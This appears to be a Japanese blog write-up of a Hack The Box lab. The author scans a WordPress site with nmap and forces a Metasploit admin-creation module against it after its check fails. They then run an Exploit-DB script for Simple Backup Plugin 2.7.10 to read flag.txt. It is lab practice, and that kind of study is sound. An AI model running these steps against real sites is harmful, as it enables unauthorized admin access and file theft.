Photo by
mackj
PENTEST[1]
1.今回はflag.txtを見つける(Platform=HTB)
2.Nmapでサーバを調査
nmap -Pn -A -p43375 83.136.254.47 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 12:49 JST
Nmap scan report for 83-136-254-47.uk-lon1.upcloud.host (83.136.254.47)
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
43375/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.6.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): Actiontec embedded (90%), Linux 3.X|2.4.X (90%), Microsoft Windows XP|7|2012 (87%)
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:3.2 cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:4.4 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (90%), Linux 3.2 (89%), DD-WRT v24-sp2 (Linux 2.4.37) (89%), Linux 4.4 (88%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 43375/tcp)
HOP RTT ADDRESS
1 0.20 ms 172.16.159.2
2 298.16 ms 83-136-254-47.uk-lon1.upcloud.host (83.136.254.47)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.22 seconds3.脆弱性がありそうな部分をさらに調査
* WordPress 5.6.1
msfconsole
search wordpress 5.6
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wp_woocommerce_payments_add_user 2023-03-22 normal Yes Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation
4.Metasploitで検索し、使えそうなので攻撃してみる
msf6 > use auxiliary/scanner/http/wp_woocommerce_payments_add_user
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) >
set RHOSTS 83.136.254.47
set RPORTS 43375
set USERNAME user
set PASSWORD pass
run
[*] Running module against 83.136.254.47
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: not-vulnerable: The target is not exploitable. Server not online or not detected as wordpress "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
set ForceExploit true
run
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Server not online or not detected as wordpress ForceExploit is enabled, proceeding with exploitation.
[*] Attempting to create an administrator user -> towa:towa123 (frank.howard@neg0r.biz)
[-] Server response:
[*] Auxiliary module execution completed結果はWooCommerce Paymentsプラグインがインストールされていないか、無効になっている可能性がある状態であることがわかった。
5.4がうまくいかなったのでWordPressのプラグイン関係を調査
まずはサイトを遷移して細かく確認
* Simple Backup Plugin 2.7.10 for WordPress
ブラウザでsimple backup plugin 2.7.10 exploitを検索してみる
6.Exploit DatabaseのPythonコードを実行してみる
python3 exploit.py http://83.136.254.47:43375 flag.txt 4とれた^ ^
感想
wpscanとかをうまく使用してもっと簡単にプラグイン情報を入手できたのかな?まだまだツールをうまく使えこなせないので練習練習
今回はざっくり内容を書いた、レポート的な感じでまとめていければいいな